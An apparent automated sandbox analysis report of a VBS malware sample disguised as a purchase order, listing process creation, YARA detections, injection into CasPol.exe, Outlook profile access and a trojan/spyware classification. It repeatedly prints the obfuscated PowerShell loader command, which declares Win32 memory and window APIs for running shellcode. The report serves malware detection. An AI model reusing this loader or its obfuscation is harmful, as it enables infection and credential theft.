UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku
          Source: Initial file: lysreklamerne.ShellExecute Blindtabletter, " " & chrw(34) & ap6 & chrw(34), "", "", 0
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5576
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5576
          Source: PO-09784893 xlsx.vbs, type: SAMPLEMatched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: Process Memory Space: powershell.exe PID: 416, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_02879188
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0287E7C9
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0287E7D8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_028796B1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07BE05D7
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07BE2070
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07BE2062
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C2F970
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C252C0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C252B0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C20040
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C20021
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C44EA8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C425A8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C425B8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C6FCA0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C6F090
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07BED639
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_00B1C0AD
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_1F3AD720
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_1F3A4FA0
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_1F3A7AE0
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_1FA719B0
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_1FA879E0
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_1FA809D2
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_1FA85128
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_1FA8C323
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_1FA8BB58
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_1FA864A0
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_1FA8DA82
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_1FA8DEC8
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_1FA84500
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_1CFDAFDA NtQuerySystemInformation,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_1CFDAFB8 NtQuerySystemInformation,
          Source: PO-09784893 xlsx.vbsInitial sample: Strings found which are bigger than 50
          Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: edgegdi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: edgegdi.dll
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-09784893 xlsx.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.cmdline
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB964.tmp" "c:\Users\user\AppData\Local\Temp\u5h0ocqr\CSC31BB2AFB2CA9494684B4A57A653EBF6B.TMP"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.cmdline
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB964.tmp" "c:\Users\user\AppData\Local\Temp\u5h0ocqr\CSC31BB2AFB2CA9494684B4A57A653EBF6B.TMP"
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_1CFDAAB6 AdjustTokenPrivileges,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_1CFDAA7F AdjustTokenPrivileges,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_azl1colp.uti.ps1Jump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@13/10@2/2
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1172:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:424:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1172:120:WilError_03
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:424:304:WilStaging_02
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-09784893 xlsx.vbs"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
          Source: Binary string: $Pl8C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.pdb source: powershell.exe, 00000005.00000002.2587473723.000000000457C000.00000004.00000800.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 00000005.00000002.2688111783.0000000009190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.2410724852.0000000000B00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr 